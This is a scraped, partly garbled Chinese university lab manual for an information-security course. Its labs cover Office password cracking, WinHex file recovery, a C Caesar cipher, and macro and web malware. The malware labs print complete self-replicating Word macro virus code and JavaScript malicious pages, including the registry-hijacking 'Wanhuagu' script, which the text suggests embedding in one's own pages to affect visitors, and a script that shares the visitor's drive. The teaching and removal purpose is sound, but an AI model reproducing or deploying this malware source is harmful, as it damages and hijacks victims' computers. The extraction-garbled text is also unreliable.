信息安全与应用-实验指导书_第1页
信息安全与应用-实验指导书_第2页
信息安全与应用-实验指导书_第3页
信息安全与应用-实验指导书_第4页
信息安全与应用-实验指导书_第5页
已阅读5页,还剩17页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

信息安全与应用试验指导书任课教师:目 录1.office口令破解工具aoxppr的使用2.Winhex编辑软件的使用3.用C语言编程实现凯撒密码4.嗅探器Ethereal的使用5.Word宏病毒试验6.Web恶意代码试验7.端口扫描X-scan的使用8.加密软件pgp的使用试验一officeaoxpprwordword文档。试验要求:某个同学设置word4,5,6,承受字母数字混合。试验步骤:aoxpprsetup,一步步安装完成;运行Aoxpp,点击“帮助key.txtO;破解类型选项,选暴力破解,字母数字混合,密码长度最大选6;某人制作一个word文档,对其进展加密;另一人对其进展解密,在Aoxppr中输入待解密文件的文件名,点击开头解密。假设该文档没有密码,软件马上就会报告此文档不用解密,4位密码很快就可破译,6位的密码破解时间要长一点,运行过程中,随时可以终止运行。系统破解后,会显示出Office文档的密码。破解过程中可以使用掩码,如密码有8位,以x开头,以99完毕,可以设置掩码为“x99“用该密码去解密OFFICE文档。winhex编辑软件的使用试验目的:1。利用Winhex查看磁盘文件的十六进制编码;2。利用Winhex实现文件的简洁数学3.加密变换;利用Winhex恢复被误删除的文件。11组,独立完成试验步骤:DX-ways文件夹,再在这个文件夹中建立case、images、temp等3个文件夹,分别用于保存案例文件、镜像文件和临时文件。运行winhex,进入系统。依据提示,必需选择“Computerforensicsinterface〔计算机取证完成后进入软件操作界面。DX-waysx-ways.txtwinhex软件。在winhex界面中,单击fil” “open。将第,2D1A保持翻开的x-ways.txt文件,单击Edi “modifydat,选择xo”并输75,即完成了该文件的加密变换。winhex中关闭x-ways.txt文件,进入“资源治理器”将该文件删除并清空回收站,此时windows系统无法恢复该文件。下面利用winhex来恢复该文件。单击“casedata”窗口中的“file” “createnewcase”建立的分析案例,然后单击“file”----“addmedium”添加的存储介质,此处为D盘。添加后x-ways”文件夹,可觉察被删除的文件已在其中。右击该文件,选择“Recover/cop试验三.用C一、试验目的:通过编程实现替代密码算法和置换密码算法,加深对古典密码体制的了解,为深入学习密码学奠定根底。二、试验内容:试验参考步骤:建工程。工程类型选“win32consoleapplication选取“FileVieSourceFiles开头编程。ws2_32.lib参加。编译生成可执行文件。 和密文。myCrySubstitude.cpp内容如下:#include“myCrySubstitude.h“intEncrypt(unsignedchar*str,unsignedchar*code){if(str==NULL||code==NULL)returnCRYPT_ERROR;intstr_length=0;inti=0;while(str[i]!=”\0”){str_length++;i++;}if(str_length>1024){printf(“1024位“);returnCRYPT_ERROR;}elseif(code[1]!=”\0”){printf(“密钥输入字符不是一位“);returnCRYPT_ERROR;}if(ToLowerCase(str)!=0){printf(“明文字符串转化小写字符出错“);returnCRYPT_ERROR;}if(ToLowerCase(code)!=0){printf(“密钥字符串转化小写字符出错“);returnCRYPT_ERROR;}intkey=code[0]-97;for(i=0;i<str_length;i++){str[i]+=key;if(str[i]>122)str[i]-=26;}returnCRYPT_OK;}intDecrypt(unsignedchar*str,unsignedchar*code){if(str==NULL||code==NULL)returnDECRYPT_ERROR;intstr_length=0;inti=0;while(str[i]!=”\0”){str_length++;i++;}if(str_length>1024){printf(“1024位“);returnCRYPT_ERROR;}elseif(code[1]!=”\0”){printf(“密钥输入字符不是一位“);returnCRYPT_ERROR;}if(ToLowerCase(str)!=0){printf(“明文字符串转化小写字符出错“);returnCRYPT_ERROR;}if(ToLowerCase(code)!=0){printf(“密钥字符串转化小写字符出错“);returnCRYPT_ERROR;}intkey=code[0]-97;for(i=0;i<str_length;i++){str[i]-=key;if(str[i]<97)str[i]+=26;}returnCRYPT_OK;}intToLowerCase(unsignedchar*str){if(str==NULL)return0;inti=0;for(i=0;str[i]!=”\0”;i++){if(str[i]>64&&str[i]<91)str[i]+=32;elseif(str[i]>96&&str[i]<123);else{printf(“输入了非英文字符“);return1;}}return0;}试验四.嗅探器Ethereal参看教材P300页。试验五.Word宏病毒试验试验目的:1. 演示宏的编写;2、说明宏的原理及其安全漏洞和缺陷;3、理解宏病毒的作用机制试验平台:Windows系列操作系统,Word2003应用程序试验步骤:1.软件设置:关闭杀毒软件;翻开Word2003,在工具宏安全性中,将安全级别设置visualbasic工程的访问。word文档,否则去除比较麻烦〔对每个翻开过的文档都要去除。2.自我复制功能演示。翻开一个word文档,然后按Alt+F11调用宏编写窗口〔工具宏VisualBasic宏编辑器〕,在左侧的project—>MicrosoftWord对象ThisDocument中输入以上代码〔参见源代码macro_1.tx,保存,此时当前word文档就含有宏病毒,只要下次翻开这个word文档就会执行以上代码,并将自身复制到Normal.dot〔word文档的公共模板〕和当前文档的ThisDocument 中,同时改变函数名〔模板中为Document_Close,当前文档为Document_Ope,此时全部的word文档翻开和关闭时,都将运行以上的病毒代码可以参加适当的恶意代码,影响word的正常使用,本例中只是简洁的跳出一个提示框。代码如下:”Micro-VirusSubDocument_OpenOnErrorResumeNextApplication.DisplayStatusBar=FalseOptions.SaveNormalPrompt=FalseSetourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>“”Micro-Virus“Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine2,“SubDocument_Close“IfThisDocument=NormalTemplateThen.ReplaceLine2,“SubDocument_Open“ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithMsgBox“MicroVirusbyContentSecurityLab“EndSub代码解释以上代码的根本执行流程如下:进展必要的自我保护Application.DisplayStatusBar=FalseOptions.SaveNormalPrompt=False超群的病毒编写者其自我保护将做得格外好,可以使word的一些工具栏失效,例如将工具菜单中的宏选项屏蔽,也可以修改注册表到达很好的隐蔽效果。用户提示。得到当前文档的代码对象和公用模板的代码对象Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIf检查模板是否已经感染病毒,假设没有,则复制宏病毒代码到模板,并且修改函数名。WithHostIf.Lines(1.1)<>“”Micro-Virus“Then.DeleteLines1,.CountOfLines.InsertLines1,Ourcode.ReplaceLine2,“SubDocument_Close“IfThisDocument=nomaltemplateThen.ReplaceLine2,“SubDocument_Open“ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWith执行恶意代码MsgBox“MicroVirusbyContentSecurityLab“3.具有肯定破坏性的宏我们可以对上例中的恶意代码稍加修改〔湾一号”的恶意代码局部为根底,为使其在word2003版本中运行,且降低破坏性,对源代码作适当修改,参见源代码macro_2.tx。完整代码如下:”moonlightDimnm(4)SubDocument_Open”DisableInput1Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>“”moonlight“Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine3,“SubDocument_Close“IfThisDocument=NormalTemplateThen.ReplaceLine3,“SubDocument_Open“ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithCount=0IfDay(Now)=1Thentry:OnErrorGoTotrytest=-1con=1tog$=““i=0Whiletest=-1Fori=0To4nm(i)=Int(Rnd*10)con=con*nm(i)Ifi=4Thentog$=tog$+Str$(nm(4))+“=?“GoTobegEndIftog$=tog$+Str$(nm(i))+“*“Nextibeg:Beepans$=InputBox$(“今日是“+Date$+“,跟你玩一个心算玩耍“+Chr$(13)+“假设你答错,只好承受震撼教育 “+Chr$(13)+tog$,“台湾NO.1MacroVirus“)IfRTrim$(LTrim$(ans$))=LTrim$(Str$(con))ThenDocuments.AddSelection.Paragraphs.Alignment=wdAlignParagraphCenterBeepWithSelection.Font.Name=“细明体“.Size=16.Bold=1.Underline=1EndWithSelection.InsertAfterText:=“何谓宏病毒“Selection.InsertParagraphAfterBeepSelection.InsertAfterText:=“答案:“Selection.Font.Italic=1Selection.InsertAfterText:=“我就是 Selection.InsertParagraphAfterSelection.InsertParagraphAfterSelection.Font.Italic=0BeepSelection.InsertAfterText:=“如何预防宏病毒“Selection.InsertParagraphAfterBeepSelection.InsertAfterText:=“答案:“Selection.Font.Italic=1Selection.InsertAfterText:=“不要看我 GoTooutElseCount=Count+1Forj=1To20BeepDocuments.AddNextjSelection.Paragraphs.Alignment=wdAlignParagraphCenterSelection.InsertAfterText:=“宏病毒“IfCount=2ThenGoTooutGoTotryEndIfWendEndIfout:EndSubwordword模板,然后检查日期,看是否是1日〔即在每月的1日会发作10的数相乘,假设作者的计算正确,那么就会建一个文档,跳出如下字幕:何谓宏病毒......如何预防宏病毒......假设计算错误,建20word文档,然后再一次进展心算玩耍,3次,然后跳出程序。关闭文档的时候也会执行同样的询问。4.去除宏病毒对每一个受感染的word文档进展如下操作:翻开受感染的word文档,进入宏编辑环境Alt+F1,翻开NormaMicrosoftWord对象ThisDocument,去除其中的病毒代码〔只要删除全部内容即可。然后翻开ProjectMicrosoftWordThisDocument,去除其中的病毒代码。毒后,假设重翻开其他已感染文件,模板将再次被感染,因此为了保证病毒被去除查看每一个受感染文档的模板,假设存在病毒代码,都进展一次去除。试验六.Web有,也要以牺牲很多功能作为代价。所谓恶意网页主要是利用软件或系统操作平台等的安全漏洞,通过执行嵌入在网页HTML超文本标记语言内的JavaApplet小应用程序,JavaScript脚本语言程序,ActiveX控件部件等可自动执行的代码程序,强行修改用户操作系统的注册表设置及系统有用配置程法恶意程序。该类程序的网页,就会在不知不觉的状况下立马中招,给系统带来不同程度的破坏。试验目的:把握网页恶意代码根本原理。试验平台:WindowsXP操作系统,IE〔InternetExplorer〕扫瞄器试验步骤:建Web页面,输入程序源码。程序源码如下:<html><bodyonload=“WindowBomb“><SCRIPTLANGUAGE=“javascript“>functionWindowBomb{while(true){“://163/“window.open(“://163“)}}</script></body></html>IE翻开该文件,观看试验结果,可以看到IE163网页。假设IE阻挡了显示内容,右键点击消灭的提示信息,选择“允许阻挡的内容看到试验现象。建Web页面,编辑程序源码。程序源码如下:<html><body><script>varcolor=newArraycolor[0]=“black“color[1]=“white“x=0;while(true){document.bgColor=color[x++];document.bgColor=color[x--];}</script></body></html>IE翻开该文件,IE显示的地方消灭黑白颜色不断的闪动。假设IE阻挡了显示内容,右键点击消灭的提示信息,选择“允许阻挡的内容看到试验现象。很多人都知道万花谷病毒的厉害,由于其危害之大,很多网站都公布了其源代码。即使不会编程,也能直接拷贝来用。以下就是这个病毒的代码:document.write(““);functionAddFavLnk(loc,DispName,SiteURL)·201·{varShor=Shl.CreateShortcut(loc+“\\“+DispName+“.URL“);Shor.TargetPath=SiteURL;Shor.Save;}functionf{try{ActiveXinitializationa1=document.applets[0];a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}“);a1.createInstance;Shl=a1.GetObject;a1.setCLSID(“{0D43FE01-F093-11CF-8940-00A0C9054228}“);a1.createInstance;FSO=a1.GetObject;a1.setCLSID(“{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}“);a1.createInstance;Net=a1.GetObject;Try{if(documents.cookies.indexOf(“Chg“)==-1){//Shl.RegWrite(“HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Start“,“://“://on888.home.chinaren/“on888.home.chinaren/“);varexpdate=newDate((newDate).getTime+(1));documents.cookies=“Chg=general;expires=“+expdate.toGMTString+“;path=/;Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun“,01,“REG_BINARY“);//消退“运行”按钮Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose“,01,“REG_BINARY“);//消退“关闭”按钮Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff“,01,“REG_BINARY“);//消退“注销”按钮Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives“,“63000000“,“REG_DWORD“);//隐蔽盘符Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegis-tryTools“,“00000001“,“REG_DWORD“);//制止注册表Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disablecmd“,“00000001“,“REG_DWORD“);//DOS程序不能用Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealM-ode“,“00000001“,“REG_DWORD“);//DOS方式Shl.RegWrite(“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCapt-ion“,“欢送来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!“);//设置开机提示标题·202·Shl.RegWrite(“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText“,“.请与OICQ:4040465联系!“);//设置开机提示内容Shl.RegWrite(“HKLM\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle“,“欢送来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!“);//IE标题Shl.RegWrite(“HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle“,“欢送来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!“);//IE标题varexpdate=newDate((newDate).getTime+(1));documents.cookies=“Chg=general;expires=“+expdate.toGMTString+“;path=/;}}catch{}}catch{}}functioninit{setTimeout(“f“,1000);}init;将以上这段JAVA脚本代码参加到你自己网页的HTML源代码中,就可以对扫瞄者JAVA脚本。万花谷病毒,用一些专杀工具来查杀,没有想到你还有另外隐蔽的一手。设 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”为01〔取消开头菜单上的“运行”项〕设 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”为01〔取消开头菜单上的“关闭”项〕设 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”为01〔取消开头菜单上的“注销”项〕设 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”为63000000〔隐蔽盘符,你也可以将此项改00000004只隐蔽C盘〕设 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”为00000001〔使注册表工具不行用〕设 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disablecmd”为00000000〔原DOS程序不行用〕设 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode”为00000000〔不能进入DOS方式〕设置“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”为“欢送来到万花谷!你中了※万花奇毒※.请与OICQ:4040465〔请与OICQ:4040465〕●设置“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText请与OICQ:4040465联系!”〔设置登录窗口的内容提示为“欢送来到万花谷!你中了※万花奇毒※.请与OICQ:4040465〕设置“HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\WindowTitl.请与OICQ:4040465联系〔设置IE窗口.请与OICQ:4040465联系〕●修改“HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Start”为““://on888.home.chinaren/“://on888.home.chinaren/”〔设置IE的首页为“://on888.home.chinaren/“://on888.home.chinaren〕某天你自己无意中点击了这种网页怎么办呢?可以承受以下的方法来解决。DOSC:\Windows\Sysbckup名目〔此名目是隐蔽属性,用Attrib命令去掉其隐蔽属性〕找到rb004.cabZIP解压rb004.cab得到四个文件,把这四个文件复制到C:\Windows下掩盖原文件,用安全模式启动电脑,运行Msconfig,然后在“启动”的标签中找到“HA.hta”把多项选择框前面的沟去掉〔可以去掉前面的勾,再重启动计算机就OK了!②在DOSscanreg/restore注册表,然后再删除启动组中的HA.hta即可。注册表。应付“万花谷”之类的脚本病毒只要实行切实可行的防范措施,就能将它们拒之门外,由于这些病毒都是通过在网页中使用恶意脚本程序来运行的可以到达防范于未然的目的。InterneInternet属性”对话框,单击“安全”页面,然后按“自定义级别”按钮进入“安全设置”对话框,将“脚本”选项中的Java和“活动脚本”都设为“禁用正常网页中全部通过脚本实现的网页特别效果也全部被禁用了。自行修改。本段代码仅供争论、学习使用,不得将本段代码用于非法场合,否则后果自负。通过在网页HTML源代码参加JavaScript脚本,同样可以实现将扫瞄者的硬盘设置为共享的目的。scriptlanguage=JavaScriptdocument.write(““);functionf{a1=document.applets[0];a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}“);a1.createInstance;Shl=a1.GetObject;Shl.RegWrite(“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags“,302,“REG_DWORD“);Shl.RegWrite(“HKLM\\Software\

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论